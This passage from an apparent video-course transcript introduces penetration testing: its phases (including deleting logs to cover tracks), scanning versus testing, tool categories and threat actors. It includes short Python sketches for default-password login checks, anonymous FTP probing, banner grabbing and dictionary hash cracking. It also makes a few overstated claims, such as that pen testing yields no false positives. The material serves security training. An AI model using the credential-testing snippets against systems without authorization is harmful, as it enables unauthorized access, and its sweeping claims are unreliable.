or a web application. Once that is done, you have done your job.
Then you have to cover your tracks, which means nobody should be able to trace you back to your own IP address and determine that you were the one who conducted this attack. So how do you do that? You delete all the logs that were generated while you were there, while you were doing certain tasks within the system or the network. You delete any user accounts you created. If there are certain files that you've created within the system, you delete those files.
And then you quietly move out, after which, because you have to submit a report to
the client, you have to do result analysis. You have to find out what your team has
done, you have to collate all that information, do an analysis of the information.
And finally, you submit a report to the client, which is known as result reporting.
Need for Pen Testing
[Video description begins] Topic title: Need for Pen Testing. Your host for this
session is Ashish Chugh. [Video description ends]
Let's now understand the necessity of conducting penetration testing. There could be a possibility that there is a compliance requirement with specific regulations. So for instance, if you talk about PCI DSS, which is the Payment Card Industry Data Security Standard, it requires organizations that handle a large volume of transactions to conduct both annual and regular penetration testing.
It could also be a reason that you want to protect your critical assets within the
organization. Now critical assets are most important to the organization. It could be
a server, it could be an application. So you want to protect that.
And why would you want to do penetration testing to protect these critical assets?
Because there would be vulnerabilities that you would want to explore. There
would be vulnerabilities that you find and then you close them. You mitigate those
vulnerabilities. So before the hacker finds it, you are able to not only find but
mitigate those vulnerabilities. You can close them.
It also helps you put appropriate security controls in place. For example, if you know there is a certain weakness within the network, let's say it's a flat network and no network segments have been put in place, so your critical file servers are on the same subnet or segment as the other users, then you know that is a weakness within the network. So you want to put an appropriate security control in place. You would probably want to create a new segment and move the file servers to that particular segment. So this is a security control that you have put in place. Because you have been able to find the vulnerabilities and close them, it will definitely help you reduce network and system downtime.
For example, if there was a particular vulnerability that was exploited by a user on
a particular server, now you know if this same vulnerability existed on another
critical server, probably the server will be taken down by the hacker or you will end
up losing data.
So what do you do? You close those vulnerabilities on the other server. Therefore,
it would help you reduce the system downtime for that particular server. Similarly,
with the network devices, if you can find the vulnerabilities, you can close them
using penetration testing. Then you know you have been able to protect your
network to a great extent.
After a hacker does damage on a network or a system, you have to remediate it. So if you are able to avoid that remediation by fixing things beforehand, you will save a lot of remediation cost. Most organizations hire a third party to do the
penetration testing of their network or infrastructure or the web application. Now
why do they do that? Because they want to get an outsider perspective.
How can an outsider who has bare minimum knowledge of the network, or absolutely no knowledge of it, penetrate and give the organization an outsider perspective of what he or she thinks, and what kinds of vulnerabilities and flaws can this person find within the network, the web application, or the servers? That depends on what the scope of the penetration testing was. At least there is a second pair of eyes looking at the targeted areas and trying to find security loopholes.
Once you have done your penetration testing, you know what areas you have to invest in. So you definitely do not want to just throw in a lot of money and put in a lot of security controls that are probably not even required. With the results of penetration testing, you have a focused outcome. To cover the flaws that have been found or the vulnerabilities that have been located, you know what kind of security controls you need to put in.
Penetration testing also exposes the real weaknesses in a specific target, which
could be a network or a web application or a server. Because in the penetration
testing, the penetration tester would tend to get deep into the web application or the
network and exploit it as much as possible. So you would find the real weaknesses
that probably your internal security team was not able to find. Because for them,
everything is perfect and everything is running as it should have been.
And most importantly, internal teams often have the impression that since they have not been breached, their security is appropriate, enough security controls are in place, and therefore there is no need to invest more. However, this may not be the true scenario. The true scenario will only come out when you see the
results of the penetration testing. Because you're trying to exploit a specific target,
you are actually simulating a real attack. You are acting like a hacker, you are
trying to exploit a particular target and exploit its vulnerabilities.
After you have done all your penetration testing, you can assess the impact of it.
Once you collate the report and do an analysis of the results or the outcomes of the
penetration testing, you'll be able to assess the impact of this penetration testing.
Pen Testing and Vulnerability Assessment
[Video description begins] Topic title: Pen Testing and Vulnerability Assessment.
Your host for this session is Ashish Chugh. [Video description ends]
Before moving ahead, let's also understand what vulnerability scanning means.
Vulnerability scanning is part of the penetration testing process. This is because
vulnerability scanning helps you discover vulnerabilities within a specific target.
And those targets can be a wired network, which is your typical Ethernet network.
It could be a web application, which is either hosted within your own premises in
the data center or it could be a third-party data center or it could be in the cloud.
It could be a wireless network that your organization is running. There could be one
or more wireless networks. But it is a myth that wireless networks are more secure
than the wired networks. That is not true. It depends on the configuration. It
depends on the settings that you have made to the wireless network.
Then comes the systems, which are your typical endpoints and the servers. And
your organization may also be using mobile apps. So you would also have to do
vulnerability scanning on these mobile apps. So moving ahead, where are we most likely to find vulnerabilities? We are likely to find them in systems, which could be endpoints or servers, or in applications or web applications that have not been patched. Many organizations do not use automated systems to patch their systems.
Now this causes a problem. Assume an organization with a hundred systems and only one IT person who has to manage them. Now if this
person has to deploy a patch on every single system in a manual way, then it will
take him maybe a week or so. Now if there is an automated system that can deploy
patches, it solves a lot of problems.
Then you have unmanaged mobile devices. A lot of organizations allow users to bring in their own devices, but they do not manage them, which means there is no application that controls these mobile devices. Users are free to use different types of apps on their mobile devices. Now why would a mobile device be a concern for the network? Because a lot of users connect their mobile devices to the network.
So if a vulnerability on a mobile device is exploited by a hacker, just imagine: the hacker will find a way into the network. Therefore, it is necessary to locate the vulnerabilities in unmanaged mobile devices. Then you also have poorly configured firewall rules. A lot of IT administrators configure a firewall; however, because there is a firewall in place, every one of them thinks that their network is safe.
If the firewall allows certain types of traffic because the rules were poorly configured, it could allow the hacker to conduct an attack on the network. For instance, if the firewall allows ICMP packets, there is a very high possibility that a DoS attack, or denial-of-service attack, can be conducted on one of the servers that is using a public IP address. Even though the server is protected by a firewall, because ICMP packets are allowed, it can still be attacked.
Then comes the problem of default passwords. This is one of the most severe vulnerabilities found in network devices. There have been many instances in the past where administrators forgot to change the default password of the edge router. So for instance, if the password was abc123 by default, they kept it as is. This is one of the major vulnerabilities that gets detected when you do vulnerability scanning.
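As a rough illustration of how a default password can be checked for, here is a Python sketch that attempts an HTTP basic authentication login against a device admin page using a vendor default. The URL and the credentials are hypothetical; a real scanner would work through a list of known defaults for the detected device, and such checks should only be run with authorization.

    import base64
    import urllib.error
    import urllib.request

    def try_default_login(url, username, password, timeout=5):
        """Return True if HTTP basic authentication succeeds with these credentials."""
        token = base64.b64encode(f"{username}:{password}".encode()).decode()
        req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
        try:
            urllib.request.urlopen(req, timeout=timeout)
            return True                      # 2xx response: the default login worked
        except urllib.error.HTTPError:
            return False                     # 401/403: the credentials were rejected
        except urllib.error.URLError:
            return False                     # host unreachable

    # Hypothetical edge device admin page still using a vendor default password.
    print(try_default_login("http://192.0.2.1/admin", "admin", "abc123"))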
Open ports are considered another set of vulnerabilities. This is because most often administrators do not close open ports, including ports that are not being used by any service or web application. Therefore, a hacker might find open FTP ports through the firewall, and that may allow the hacker to conduct an attack. So the fact that these ports are open is itself a vulnerability. You can always configure something as a replacement for FTP and open those ports instead.
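A common related check is whether an exposed FTP port also allows anonymous logins. Here is a minimal Python sketch using the standard library ftplib module; the target host is hypothetical, and again this should only be run against systems you are authorized to scan.

    from ftplib import FTP, error_perm

    def allows_anonymous_ftp(host, timeout=5):
        """Return True if the FTP server on host accepts an anonymous login."""
        try:
            ftp = FTP()
            ftp.connect(host, 21, timeout=timeout)
            ftp.login()          # no arguments means an anonymous login attempt
            ftp.quit()
            return True
        except (error_perm, OSError):
            return False

    print(allows_anonymous_ftp("192.0.2.10"))  # hypothetical lab host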
So what is a good time for vulnerability scanning? In reality, there is no fixed time. It depends entirely on your need and on when you are rolling out business applications or making changes to your infrastructure. So for instance, before launching an application, that is a good time to do vulnerability scanning of the application.
Now once you have done that and found certain vulnerabilities that exist within the application, you would close them. Let's say, one month later there
is an update on the web application; a new module has been added to the
application. So what do you do? You go back and conduct another vulnerability
scan because this new module might have introduced another vulnerability. So
therefore, that is another good time when you should conduct a vulnerability scan.
And of course, vulnerability scans should happen on a regular basis. It depends on the organization. They could do it every six months, or they could do it once a year. It depends entirely on the organization. A vulnerability scanning requirement may also come up because of a compliance framework. For instance, if you are opting for PCI DSS, you will have to conduct a vulnerability scan at a fixed interval. That becomes a demand of the compliance framework.
Let's now look at some of the tools for vulnerability scanning. So you have Nexpose Community, which aims to cover the entire vulnerability management life cycle. Then comes Tripwire IP360, which is a vulnerability management solution. Then comes Nikto, which is a command-line vulnerability scanner. Then we have Retina CS Community, which is a vulnerability management solution and a scanner. Then one of the best-known solutions, which is an open-source solution, is OpenVAS, which is a security framework for vulnerability scanning and management.
Let's now look at the differences between vulnerability scanning and penetration
testing. So the goal of vulnerability scanning is only discovering vulnerabilities.
Penetration testing, on the other hand, goes one step ahead. And it not only
discovers the vulnerabilities, it also exploits them. Vulnerability scanning mostly
uses automated methods. So the tools you will run, they will automatically go and
scan the web application or the server or a system and find vulnerabilities.
Penetration testing, on the other hand, is a manual method. If you are not using a ready-made exploit, you will have to design your own exploit, code it, and then find a way to deploy it. Vulnerability scanning can also report false positives. On the other hand, penetration testing does not give you any kind of false positives. It only reports what has been done.
As far as the scope is concerned, vulnerability scanning has a very broad scope. So
it tries to find as many vulnerabilities as it can, but it does not go into the depth of
those vulnerabilities. Penetration testing, on the other hand, is very focused. It will
not only find the vulnerabilities but it will try to exploit them. So it uses depth over
breadth.
Vulnerability scanning can be performed by a newbie or a novice user because you
are using automated tools. Penetration testing, on the other hand, cannot be
performed by a newbie or a novice person. It has to be performed by an experienced pentester. One of the main reasons is that not only do you need to know about certain tools, you also need to know about certain exploits that can perform certain types of
tasks.
Vulnerability scanning, because it is automated, is quick. It takes only a few minutes to scan a server or a web application. Penetration testing, on the other hand, might span several days or several weeks, depending on the size of the penetration test that you are performing and on the number of targets that are included in it.
The outcome of a vulnerability scan is a list of vulnerabilities. In penetration testing, not only do you get the list of vulnerabilities, you also have the methods to exploit them. You also find the remediation, and you list the recommendations as the output of the penetration test. Vulnerability scanning is a passive scan. Therefore, it does not directly get into the web application or the server and disrupt its functioning.
However, with penetration testing, because you are trying to exploit certain vulnerabilities, there is possible disruption. And this is considered to be an active attack because it is a simulated attack just like a real one. Vulnerability scanning is a detective type of scanning, which means you only detect vulnerabilities. Penetration testing, on the other hand, is preventive. Not only do you find the vulnerabilities, you exploit them. You then find the remediation to cover those vulnerabilities and reduce the risk or exposure of somebody else finding more vulnerabilities.
As we have discussed, vulnerability scanning runs in the passive mode and
penetration testing, on the other hand, is intrusive. It gets into the application. It
tries to find as many vulnerabilities as it can and it then tries to exploit them.
Therefore, it is not only intrusive, it is also considered to be aggressive.
So once the vulnerability scanning is done, what are the next steps? So you have to
remediate those vulnerabilities. Let's assume that you are not proceeding with the
penetration testing, your scope is only to do vulnerability scanning. Then after you
find them, you find out the methods of remediating these vulnerabilities.
With penetration testing, on the other hand, you have to ensure that you have patched the vulnerabilities and put enough security controls in place to ensure that similar vulnerabilities are not discovered again.
Types of Pen Testing
[Video description begins] Topic title: Types of Pen Testing. Your host for this
session is Ashish Chugh. [Video description ends]
Let's now understand the different types of penetration testing. So essentially there
are three types. You have white box, you have grey box, and you have black box.
Going forward, we'll be looking at each one of them in detail. So when you talk
about black box penetration testing, the pentester or the person conducting black
box penetration testing has zero knowledge of the network.
In the black box penetration testing, the pentester does not know anything about the
network except for an IP address range. That is all they are given, and for the rest they have to figure out what needs to be done. In most cases of black box penetration testing, the
pentester is typically an external entity who you have hired to exploit the network
or the system to the fullest.
Therefore, the person conducting the penetration testing or the pentester just knows
that there is a certain type of outcome that is expected and that should happen
without fail. Also, there is no programming code that is given to the pentester.
Remember, they are just given an IP address range. There is nothing else, no
architecture, no programming code, no access to the network has been given to
them. They have to just sit outside the network and they have to try to exploit it.
So this type of testing takes more time because the pentester does not know
anything about the network or the web application. However, this particular method
is more effective than the white box penetration testing or grey box penetration
testing because the pentester can provide an accurate assessment of the security of
the network.
Now when you talk about white box penetration testing, it is also known as clear
box testing and it is a complete opposite of black box penetration testing. The
pentester has the full knowledge about the network. They have access to the
network diagrams, they have access to the list of systems and the IP addresses.
They have access to the IP ranges that are used within the network, and they also
have the user credentials to log on to the systems.
And of course, they also get access to the programming code. Therefore, it is also
known as full knowledge penetration testing because nothing is hidden from the
pentester. In this case, the pentester conducting the white box penetration testing
takes less time than the one who is conducting black box. This is because the pentester has all the information about the network that is needed for penetration testing. On
the other hand, the black box guy doesn't have anything except the IP address
range.
Let's now understand what grey box penetration testing means. The pentester who
is conducting the grey box penetration testing has partial knowledge of the system
or the network. This means there is limited information provided to the pentester. For example, the pentester will not have the user credentials or the configuration details about the systems or the network.
However, they may be given the application name and the IP address but you do
not share the application version or the services that the application is running. So
therefore, there is limited knowledge that is shared with grey box penetration testers. And it is a combination of both black box and white box penetration testing. This is because you are sharing some information but not everything with the pentester. And just as they have no usernames or passwords, they also do not have access to the programming code.
So what are some of the areas where penetration testing can be used? So one is
your network; that is the typical Ethernet network you are running. Then it could be
wireless network, which could be small or large in size. It could be running
different types of wireless protocols; something like WPA, WPA2.
And it could also be used for social engineering because humans are the weakest
link in the security chain. So you may use social engineering methods to try to exploit some of the employees within the organization. For example, you can just send them a phishing mail, or you can call them up and pretend to be somebody else
from the police department. So you could use this particular method.
Then it could also be used for web applications because you would want to find the
vulnerabilities, you would want to mitigate those vulnerabilities. You want to
reduce the risk of that application getting attacked. Then comes the client-end,
which are the endpoints. Now since users are using these endpoints, there are going
to be configuration problems, there are going to be security issues. So you have to
find out those issues and close them.
Pen Testing Weaknesses
[Video description begins] Topic title: Pen Testing Weaknesses. Your host for this
session is Ashish Chugh. [Video description ends]
Penetration testing has advantages and disadvantages. Let's now first look at the
advantages or the pros of penetration testing. It helps you identify vulnerabilities,
which could be low risk or high risk. And of course, high-risk vulnerabilities are
the attention grabbers because you would want to fix them first.
It is a proactive security approach because you want to find these vulnerabilities,
reduce the risk on the application or the network, and you want to patch them
properly because you do not want a hacker to find these vulnerabilities, even
though there would be cases where hacker would still be able to find some more
vulnerabilities which you would have not been able to find.
So for instance, consider a zero-day vulnerability in an application. Now a zero-day vulnerability is something that is probably not looked at during penetration testing. And it can allow the hacker to exploit the entire application. It also
helps you exploit real security risks. So for instance, there is a vulnerability that has
been detected. You can exploit it and see what kind of damage it can cause if the
hacker does the same thing.
So if it is a high-risk vulnerability, the risk of being exploited is also high. So you
want to find that vulnerability and you want to mitigate that particular risk by
closing it. During the penetration testing, you may also come across some known
and unknown flaws. So for instance, I just spoke about the zero-day vulnerability. That is an unknown flaw. It has never been reported by the software developer, nor has it ever been detected earlier. So you've been able to detect that particular kind of
flaw.
And then there would be some known flaws. So for instance, Server Message
Block version 1 protocol runs on older versions of Windows. Now if you are still
running older versions of Windows, you know that there are some known flaws on
this particular endpoint. Therefore, you can discover all this using penetration
testing. Then once you are done finding the vulnerabilities, once you have
exploited them, towards the closure of the penetration testing project, you have to
submit a report to the client where you can advise the client how to close out these
vulnerabilities.
Let's now look at disadvantages or cons of penetration testing. So first of all, it is
time-bound. Every penetration test has to happen within a specific time limit. Now
if you are going to take six months to conduct a penetration test, it is not going to
work out because things in the network or the infrastructure would have changed
by then. So the penetration testing that you started six months back is no longer
valid. So it has to be finished within a few days or a few weeks, depending on the
scope of the penetration testing.
There are limited resources. This is because you may not have the complete
manpower or the tools to conduct penetration testing. Or there are no inputs, help, or resources provided by the client. In many cases, because the client wants the attack to be simulated like a real attack, they'll give you limited access to their network.
Assume that you've been asked to do black box penetration testing. In that case,
you only have the IP address range. You do not have any kind of access to the
network. Therefore, there is a limited access or no access at all. You can also use
limited methods. Now these methods here means that if you know there are certain
type of vulnerabilities that exist within a particular application, you can only use a
specific method to exploit it.
So penetration testing is not where you would develop innovative methods to try to exploit a vulnerability. You use the limited methods that you know of, or maybe add something that can help you achieve the end goal.
Availability of the production system is also a question mark in this scenario
because organizations would typically not give you access to these production
systems during the daytime. That is because their users are connected and there is
always a fear of a particular production system crashing or becoming unavailable
during the penetration testing. Then you have limited experiments.
Now in penetration testing, you cannot do too much experimenting with the client's servers. There would be production servers and staging servers, depending on the scope of the project. There is not much scope to do a lot of experiments, because a lot of experiments will require more time and you only have limited time. Secondly, a lot of experiments may not give you the correct results.
The tester's skill is another thing that needs to be watched out for. Not everybody in the team will be an expert in penetration testing. Therefore, you should ask the most experienced pentester to front-end the project, because that person is the one who is going to be doing a lot of the exploitation of the systems and the network. Therefore, that person must be brought forward.
As more and more vulnerabilities are being discovered, more and more exploits are being created. If you take the example of the Metasploit Framework, there
are continuous additions of new exploits. Now you need to have more in-depth
knowledge about the exploits. During the penetration testing, you do not have the
liberty of sitting and trying to find an exploit which can exploit a particular
vulnerability. You will not get the time. You will not have the liberty of spending
and wasting time on finding exploits. So this becomes a real challenge.
Because sometimes a vulnerability is less known but you need to exploit it. And
therefore, if you do not have sufficient knowledge, this becomes a drawback of
penetration testing. Most often, clients are apprehensive or scared to hand over the production systems to penetration testing teams. This is because if
anything goes wrong in the penetration testing, the client might end up losing all
the data in the application. So therefore, during the penetration testing, you have to
handle the data very, very carefully.
Another disadvantage of penetration testing is that the client must trust the
pentester. Because the client is handing over critical information, the pentester is
actually getting into the network and finding lot of information which can be used
for hacking into a network or a web server or a web application. Therefore,
sometimes the clients do not really trust the pentesters and give them very, very
limited information.
Types of Pen Testing Tools
[Video description begins] Topic title: Types of Pen Testing Tools. Your host for
this session is Ashish Chugh. [Video description ends]
Let's now talk about the categories of tools that are used in penetration testing. So
there are various categories that fall under penetration testing. You have scanning,
which means you scan the network or scan the traffic that is flowing over the
network. You have credential testing, which involves recovering passwords or
cracking passwords. Then you have debugging, which involves more of reverse
engineering kind of methods.
Then comes the mobile category. There are a lot of mobile apps that most organizations use, so you have tools that can be used to test out these mobile apps. Then you have OSINT, which stands for open source intelligence gathering. There are tools available that can help you find a lot of information on the Internet in a passive mode; for example, you can try to find out all the e-mail addresses that are publicly made available by an organization.
Moving on, you have the wireless category. There are tools like Kismet that are available for wireless penetration testing. Then you have web proxies. You have tools like OWASP ZAP, which is a web application security scanner. Then there is another web proxy, the most widely used one, known as Burp Suite. Then comes social engineering. You have tools like the Social-Engineering Toolkit that can help you conduct a social engineering attack.
Then comes the remote access. You have various tools that can be used. So for
instance, Netcat is one tool that can be used for penetration testing in remote access
category. Then finally, you have the networking category in which you have tools
like Wireshark, which is a packet capturing tool. You can intercept lot of traffic
from the network and analyze it.
Let's first look at some of the scanning tools. Scanning tools are mainly used for
scanning a network for finding live systems, systems that are alive on the network.
Or they could also be used for finding open ports or running services on a system.
Some of the examples of scanning tools are Nmap, which is known as Network
Mapper. It is an open-source security scanner which is mainly used for scanning for
open ports and services.
Then comes Netcat, which can send data across network connections using the TCP and UDP protocols. After that, there is another one called MyLANViewer, which can
scan IP addresses and find open ports and services. Then comes OpenVAS, which
is used for mainly scanning the vulnerabilities of a system. Then comes hping3,
which is an upgrade of a tool called hping and it allows you to send custom TCP
and UDP packets.
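To give a flavor of what these scanners do under the hood, here is a minimal Python sketch of banner grabbing: connect to a TCP port and read whatever the service announces. Many FTP, SSH, and SMTP services identify themselves on connect, which is how a scanner guesses the running service and version. The host and port are hypothetical.

    import socket

    def grab_banner(host, port, timeout=3):
        """Connect to a TCP port and return whatever the service sends first, if anything."""
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.settimeout(timeout)
                return s.recv(1024).decode(errors="replace").strip()
        except OSError:
            return None

    print(grab_banner("192.0.2.10", 22))  # an SSH service typically announces its version here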
Moving on, then we come to credential testing tools which are essentially tools that
deal with passwords, either recovering the passwords or cracking the passwords.
There are various tools that are available in this category. The first one is Medusa,
which is an open-source password auditing tool. Then comes Cain and Abel, which
is a password recovery and password cracking tool. Then comes the THC-Hydra,
which is a login cracker for various protocols, and you can crack passwords for
various web applications.
Then comes Hashcat, which is a password recovery tool. Finally, one of the most widely used tools is John the Ripper, which is a free password cracker.
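To show the basic idea behind these password crackers, here is a minimal Python sketch of a dictionary attack: hash each candidate word and compare it against a captured hash. Real tools such as John the Ripper or Hashcat do the same thing at enormous speed, with rules, salts, and many hash formats; the hash and wordlist below are made up for the example.

    import hashlib

    def dictionary_attack(target_hash, wordlist, algorithm="sha256"):
        """Return the candidate word whose hash matches target_hash, or None."""
        for word in wordlist:
            if hashlib.new(algorithm, word.encode()).hexdigest() == target_hash:
                return word
        return None

    # Hypothetical captured hash of the weak password "abc123".
    captured = hashlib.sha256(b"abc123").hexdigest()
    print(dictionary_attack(captured, ["letmein", "password", "abc123"]))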
Let's now move on to debugging tools. Debugging tools are mainly used for
reverse engineering of an executable file or for performing an analysis of the
executable. There are various tools. So one you have is OllyDbg, which is a debugger for binary analysis. Then comes IDA, which is an interactive disassembler for software. The next one in line is Immunity Debugger, which helps with reverse engineering files. GDB is the GNU Debugger, used for debugging C and C++ programs. Then comes WinDbg, which is a debugger for Windows, and it helps to find and resolve errors in a system. Moving on to the mobile category, there are three main tools. The first one
is Drozer, which is mainly used for Android exploits. The next one is APKX, which is used for decompiling an APK file; an APK file is the package format for Android apps. Then comes APK Studio, which is an IDE for reverse engineering an APK file.
Let's now look at OSINT, which is open source intelligence. There are various
tools. Some of them are online, some of them are offline, which means you can
install them on your system. First one is WHOis, which is a domain name
registration database. You can simply go to the WHOis website and enter a domain
name, and it will give you the complete information about the domain. However, if
the domain is marked private, then you will not get any information.
The next one is Maltego, which is used for open source intelligence. It is used for
finding relationships between various pieces of data. Then comes Recon-ng, which is an information harvester. The next one is theHarvester, which is used for finding e-mail addresses. So you can put in a domain name, and it can find the e-mail addresses associated with that domain that are publicly available on search engines.
Let's now talk about Shodan, which is a search engine for finding devices connected to the Internet.
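As a small illustration of passive OSINT, here is a Python sketch of a raw WHOIS lookup. WHOIS is just a plain-text query sent over TCP port 43; the server shown is the registry WHOIS server commonly used for .com domains, and for other top-level domains you would query a different server.

    import socket

    def whois_query(domain, server="whois.verisign-grs.com"):
        """Send a WHOIS query over TCP port 43 and return the raw text response."""
        with socket.create_connection((server, 43), timeout=10) as s:
            s.sendall((domain + "\r\n").encode())
            chunks = []
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks).decode(errors="replace")

    print(whois_query("example.com"))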
Let's now move to the wireless category. In the wireless category, there are various tools, but we have listed four key tools that you can use.
So first one is WiFi-Pumpkin, which is a framework for rogue Wi-Fi access point
attacks and can create fake networks. Next one is Aircrack-ng, which is used for
assessing the Wi-Fi security.
Then comes Kismet, which is a wireless packet sniffer and intrusion detection
system. Finally, WiFite is a tool that can attack various wireless protocols, such as
WEP, WPA, and WPS. Let's now look at the web proxy category. Just like the
other categories, this category also has various tools. First one is OWASP ZAP,
which is a web application security scanner. Then comes Fiddler, which logs HTTP
and HTTPS traffic from a system.
One of the most widely used is Burp Suite, which acts as a proxy between the
browser and the application. So when configured correctly, you can actually
capture the traffic which is going from a browser to the web application. And if the
traffic is flowing in clear text, it can help you capture a lot of details, such as usernames and passwords, for that particular web application. Then comes ratproxy,
which is a passive web application tool. Then comes the mitmproxy, which is used
for intercepting HTTP and HTTPS traffic.
Now let's look at some of the tools that are available in the social engineering
category. The first one is Maltego, which helps to find and visualize data. It is an open source intelligence tool which is used for finding relationships between various
pieces of data. Then comes Social Engineering Toolkit (SET), which is used for
conducting social engineering attacks.
So using this tool, you can create phishing e-mails, you can create spam e-mails,
and then you can use other tools to deploy them. Then comes BeEF, which is
Browser Exploitation Framework, mainly used to hack web browsers. Let's now
move to the remote access category. The first one is SSH, which is known as
Secure Shell. It is used for creating encrypted communication channels.
Then comes Netcat, which can send data across network connections using the TCP and UDP protocols. Then comes proxychains, which forces a TCP connection to use a proxy. Then comes Ncat, which is used for writing, redirecting, and
encrypting data across a network.
Let's now move to the last category, which is networking. There are various tools in
the networking category. The first one is Wireshark, which is a packet capturing tool. It can intercept traffic flowing across the network from all systems. You can then analyze the traffic and see which traffic is genuine and legitimate and which traffic is considered to be malicious. Then comes hping3, which is an upgrade of the hping tool; it allows you to send custom TCP/IP packets. Then comes the tcpdump tool, which is a command-line packet analyzer. Finally, there is the Kismet tool, which is a wireless packet sniffer; we also looked at this tool in the wireless category.
Target Selection for Pen Testing
[Video description begins] Topic title: Target Selection for Pen Testing. Your host
for this session is Ashish Chugh. [Video description ends]
Let's now look at target selection. When we are finalizing the scope of penetration
testing, we need to essentially look at the target selection. There could be various
types of targets that need to be defined when we are finalizing the scope.
Now because the scope can be very limited or it could be very broad, the number of
targets and the types of targets will differ. It is not essential that all the penetration
testing projects that you do will have the same types of targets. Some would have limited targets; let's say one project has a web application as the target, while another penetration testing project has the complete network as the target. So it would depend on the scope of the project, and you would only select targets based on that.
It is not necessary that every penetration testing would have only one target. There
could be one or more. So for instance, not only the web application, you would also
have to exploit the web server and some of the other servers that are present on the
network. So depending on the scope of the project, the number of targets can also
differ.
Let's now look at the types of targets. Previously, we spoke about how there could be one or more targets included in the penetration testing scope. Now these
types of targets differ. So it could be an internal target, which is internal to your
network. It could be an on-site target, which is hosted somewhere in the data
center. It could also be an off-site target, which could be a vendor or a partner firm
where your system is located. It could also be an external target, which is located
somewhere remotely and it is external to your network.
Then you also have first-party hosted, which means it could also be hosted in a data
center by one of your partners. Then it could also be third-party hosted, which
means it could also be located somewhere in the cloud. Let's say one of the web applications is hosted either on the Azure network or the Amazon cloud network; it
could be third-party hosted.
Then the target could also be physical, which means you also want to exploit the physical boundaries or the physical security of a building. You want to gate-crash or tailgate into a building or a secure location and see if the guards or the systems are able to stop you. Then it could also be users, which means if you conduct a social engineering attack, do the users fall for it? When you talk about SSIDs, these are the IDs of wireless networks. Can you find an SSID? That is not a very difficult thing to do; there are tools that can find hidden networks. But can you exploit those wireless networks beyond that? When
you refer to applications, it could be locally hosted or it could be somewhere in the
cloud or it could be somewhere on a third-party server in the data center. So you
need to exploit that. So this could also be one of the targets. And web applications
and networks are two prominent targets when you are dealing with penetration
testing.
Threat Actors
[Video description begins] Topic title: Threat Actors. Your host for this session is
Ashish Chugh. [Video description ends]
Let's now look at threat actors. So what is a threat actor? It is an individual or a group that can cause harm to an asset or assets in an organization. Harm can be in the form of modification, destruction, or disclosure. So for example, if somebody takes confidential information from your organization and makes it public, that is also harm. And the person who has done it is a threat actor. So in a nutshell, threat actors are responsible for a threat.
They could be a group, a person, or any other entity. A threat actor is basically a person or a group that has malicious intent and wants to break the security of a system or a network. This means the threat actor wants to cause some sort of harm to information that either resides on your network or somewhere else outside your network. But they mean to cause harm.
There are different types of threat actors, who are divided into different categories
based on their skillsets. So there could be a threat actor who is a newbie, who uses
predefined tools and scripts by the other threat actors. [Video description
begins] The following information is displayed on screen: A threat actor is
categorized into a type based on the skillset and intent. [Video description ends]
And then there could be a set of threat actors who are highly skilled and use
sophisticated methods to steal information or cause harm to the information that
resides on your network. A threat actor basically looks for vulnerabilities that can
be exploited. So if there are no vulnerabilities in a web application or in the
network, then threat actors cannot do anything.
A threat actor would basically look for vulnerabilities that can be exploited. This
means that they are looking for something to cause harm with. So they are looking
for information that can be leaked out or can be destroyed or can be modified. Or
they are trying to bring down a network or rip apart a web application, which
means they want to extract the information from the back end database and make it
public or use it for their own benefits.
So going ahead, in a nutshell, threat actors are looking for vulnerabilities that can be exploited. This means if no vulnerabilities exist within a web application or a network or a server, threat actors cannot do anything. Therefore, they are only looking for something that can be exploited, without which threat actors cannot exist. So if there are no vulnerabilities, there are no threat actors.
Moving ahead, let's look at the categories of threat actors. So the first one is
external threat actors. These are the individuals, groups, or organizations that are
not authorized to access the system. However, they use illegal means and get access
to the systems of an organization. Systems here could be a server, it could be the
entire network, or it could be a web application or a web server.
Since they do not belong to this organization, they can cause more severe harm and
damage to the systems of the organization. These people can be low-skilled, which
are known as script kiddies. Or they could be advanced agents, who are highly
skilled and can use sophisticated tools.
Moving on, internal threat actors are the ones who are usually the employees of the
organization or they are associated with the organization as a contractor or as a
vendor. They can, accidentally or intentionally, cause damage to the information or the assets of the organization. This means that somebody might
unknowingly delete a critical set of data.
And if you talk about intentionally, somebody who is moving out of the
organization, which means the employee who is leaving the organization, before
leaving, this person deletes a critical piece of information. Now the internal threat
actors are privileged to access the resources of the organization. Now the access
may vary from employee to employee. So for example, the CEO of the organization may have access to all the information that resides on the network, whereas a person lower in the hierarchy may have only limited access.
Now the third category is natural threat actors. These could be floods, hurricanes, or thunderstorms, which could cause damage to the systems or the network. Now if your office is situated in a location where there are rivers nearby and a flood happens, then there is a possibility that the building might get impacted, which means the network is also likely to get impacted. There may also be an indirect impact. Say the provider of your Internet connectivity is located in a location that is impacted by heavy flooding. Now the connectivity is down. So therefore, you are also indirectly impacted by this natural threat. Moving
on, let's look at different types of threat actors. Previously, we defined what a threat
actor is.
Now we are going to look at different types of threat actors. The first one is
hackers. Hackers have an intention to cause damage or destroy data. They will do
this or simply they will steal the data and sell it in the black market or in the
underground Internet. So their main intention is they want to cause damage. Then
you have hacktivists, who have a political or social reason. They will attack an
organization or a political party because they want to fulfill a social or political
reason.
Then comes nation states, who focus on hacking into either military or the
nation. [Video description begins] The following information is displayed on
screen: Nation states/State-sponsored. [Video description ends] They are well
sponsored. They are well funded by large groups or a different nation. Then comes
script kiddies, who use predefined tools and don't have much knowledge into
hacking. So they will try to use these tools to gain access to a network or a system.
Then comes insider actors, who are internal employees. We just discussed what
insider threat actors were. They are the employees or associated vendors or
contractual employees who work with the organization. They have some level of access to the systems and the information.
Then comes Advanced Persistent Threats, or APTs, who are able to conduct highly
sophisticated attacks and can remain undetected for a long time. Moving on, organized crime threat actors are mostly after money. They will hack into
large financial organizations or they will hack into banks or any other organization
to gain access to the information which can reward them with monetary benefits.
Types of Assets
[Video description begins] Topic title: Types of Assets. Your host for this session is
Ashish Chugh. [Video description ends]
Now let's look at what an asset is. An asset is something that has a discrete value for the organization, which means anything that brings value to the organization can be considered an asset. Assets can be of different types. An asset could even be something like hardware, or it could be software. Even people are considered to be assets.
In an organization, assets will continue to change, which means old ones are
removed or discarded and the new ones are added. A simple example in this
context could be you have servers which are outdated. You need to remove those
and you need to bring in new servers. Or a web application is outdated, and now you need to upgrade it to a new version.
So therefore, along with the change in assets, the vulnerabilities and threats will
also change. Therefore, it is essential that you know what kind of assets you are holding and what kind of value they bring to you. Now an asset can also have an owner, somebody who owns the asset. Then there could also be a custodian,
which means somebody who manages the asset.
